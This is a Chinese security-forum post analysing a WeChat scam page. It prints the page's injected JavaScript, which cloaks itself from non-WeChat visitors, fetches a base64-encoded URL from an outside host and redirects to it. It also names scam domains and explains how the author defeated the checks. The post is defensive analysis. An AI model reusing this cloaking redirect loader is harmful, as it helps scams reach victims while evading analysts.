分析一个微信诈骗网站 - 〖系统安全〗

z3960

级别: FLY版主

发帖: 786303

飞翔币: 211574

威望: 215717

飞扬币: 2615486

信誉值: 8

只看楼主更多操作 0 发表于: 2021-08-20

起因

家庭群里有人发了这个链接：这个骗子的网站实在是太水了，标题都不改一下，年份也不核对(明明是2022才70周年好吧？)：不说了，上机干它

初探

复制链接，电脑打开，发现重定向到了百度(百度：你礼貌吗？)，伪装微信ua也没有用分析一下，发现它好像利用了注入漏洞，通过评论注入代码来跳转，好家伙经过一波分析，发现xs24这个确实是关键代码
复制代码 隐藏代码var id=24; var url='https://xssme.cn';function GetQueryString(name) { var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)"); var r = window.location.search.substr(1).match(reg); if (r != null) return unescape(r[2]); return null;}function isWx() { var platform = navigator.platform; var win = platform.indexOf('Win') === 0; var mac = platform.indexOf('Mac') === 0; var ua = /micromessenger/.test(navigator.userAgent.toLowerCase()) if (ua && !win && !mac) { return true; } else { return false; }}function checkVersion() { var userAgent = navigator.userAgent.toLowerCase(); var key = /micromessenger/; let res = false; if (key.test(userAgent)) { var index = userAgent.search(key); let version = ''; for (var i = index + 15; i < userAgent.length; i++) { var item = userAgent; if (/^d{1,}$/.test(item) || item === '.') { version += item; } else { break; } } version = parseFloat(version); if (version >= 7.0){ res = true; } } return res;}function openLink(url) { if(window !== top) { top.location = url; return; } var label = document.createElement('a'); label.setAttribute('rel', 'noreferrer'); label.setAttribute('href', url); try { document.body.appendChild(label); } catch (e) { location = url; } label.click();}function init() { var queryUrl = url; var rmd = Math.random().toString(36).substr(2); var entranceUrl = `${queryUrl}/XT-${id}-${rmd}.ppt?t=${Date.now()}`; fetch(entranceUrl).then(response => response.text()).then(res => openLink(atob(res)));}if (!isWx() || !checkVersion()) { openLink('http://www.baidu.com');} else { init();}
这个函数的命名还是挺让人舒服的~~，一看就是一个有素养的程序员编写的~~不多说，保存整个js下来，把isWx, checkVersion都改成return true;Edge控制台运行，跳转到了http://y.ueicuk.abkrsc.cyou/XK-2-ecc5649e38ff2e82d7e1023e7469737487754969?_douyutv=5a817cf682e73c5b356f2803a2e3af61&ex=24 ，但是马上又到了已停止访问该网页的提示难道已经被举报了？手机微信打开，发现网页还在，那一定又是一个用来迷惑分析者的跳转从请求发起程序链顺藤摸瓜，大概率就是这个k2.js了明显有混淆，并且很长从下面的网络请求大部分都是它发出的可看出它就是主要脚本我不会分析这么长还混淆的脚本，那么继续看网络请求，发现一个有意思的（ppt?）用PPT打开，发现就是一串字符，那么修改后缀名为.txt打开熟练地翻到末尾有“=”，盲猜base64，解密一波~明显是json格式，然后unicode转中文呐，数据差不多出来了，甚至还有不堪入目的小广告。。。(值得一提的是这些小广告的链接也对平台做了限制)继续分析下去也没意思了~~（主要不会了）~~，那么就反手一个举报，草率结束了吧。

再探(8-19更新)

看到这么多人回帖，我不继续下去都不好意思了那么我们首先阻止k2.js加载然后访问网址，看看会有什么影响主逻辑没有变，页面能够正常工作，那么这个js作用应该就是控制跳转那么接下来分析一下“马上提现”选中元素，查看事件侦听器的click事件，只有一个（好耶）点进去康康，居然没有加密简单翻译一下，它的作用是检查goshare是不是一个函数，如果是就调用，不是则提示"提现失败"并刷新。下个断点，发现goshare的值是undefined。goshare有两种可能的定义来源：
微信内置浏览器自带
前面已阻止的k2.js里定义

从简单的入手，先验证第一种猜想写一个简单的html，上传到个人网站微信打开并点击按钮，没有反应，那么goshare应该在k2.js里果然在里面找到了goshare格式化后先搜索weixin110去除跳转运行，发现就得到了前面的base64的json数据（由于我装有idm所以自动下载了）最后加上goshare();，得到了分享页面，就是有点乱码点击提现按钮就是刚刚的提示这个样本的分析就到此结束了，唯一的遗憾就是不知道它在后台做了什么，好像就是有一个请求得到了ip地址可能就是像zuxin521所说赚取广告费吧